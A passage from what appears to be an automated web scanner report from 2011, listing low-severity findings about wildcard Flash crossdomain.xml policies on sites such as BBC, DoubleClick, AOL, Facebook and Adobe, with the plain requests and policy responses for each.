The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: buyonline.aegonreligare.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 426
Content-Type: text/xml
Last-Modified: Sun, 23 Jan 2011 13:01:36 GMT
Accept-Ranges: bytes
ETag: "0f87caafdbacb1:e6c"
Server: Microsoft-IIS/6.0
Date: Sat, 14 May 2011 14:12:48 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.localhost" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.127.0.0.0" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mds" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.192.168.1.35" secure="false"/>
...[SNIP]...

7.41. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sat, 14 May 2011 14:03:58 GMT
Date: Sat, 14 May 2011 14:01:58 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.42. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 14 May 2011 10:44:18 GMT
Expires: Sun, 15 May 2011 10:44:18 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 11665
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.43. https://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 14 May 2011 03:35:59 GMT
Expires: Sun, 15 May 2011 03:35:59 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 44940

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.44. http://js.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Sat, 14 May 2011 22:59:21 GMT
Date: Sat, 14 May 2011 22:29:21 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

7.45. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=114
Expires: Sat, 14 May 2011 14:03:50 GMT
Date: Sat, 14 May 2011 14:01:56 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.46. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 14 May 2011 10:49:15 GMT
Expires: Sun, 15 May 2011 10:49:15 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26108
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.47. http://server.iad.liveperson.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:11c4"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 14:13:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

7.48. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Sat, 14 May 2011 18:37:53 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.49. http://www.adobe.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Sat, 14 May 2011 02:59:37 GMT
Keep-Alive: timeout=5, max=498
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Sat, 14 May 2011 14:13:42 GMT
Age: 473
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

7.50. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.32.227.104
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.51. https://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.235.51
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.52. http://www.sapient.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sapient.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:2101"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
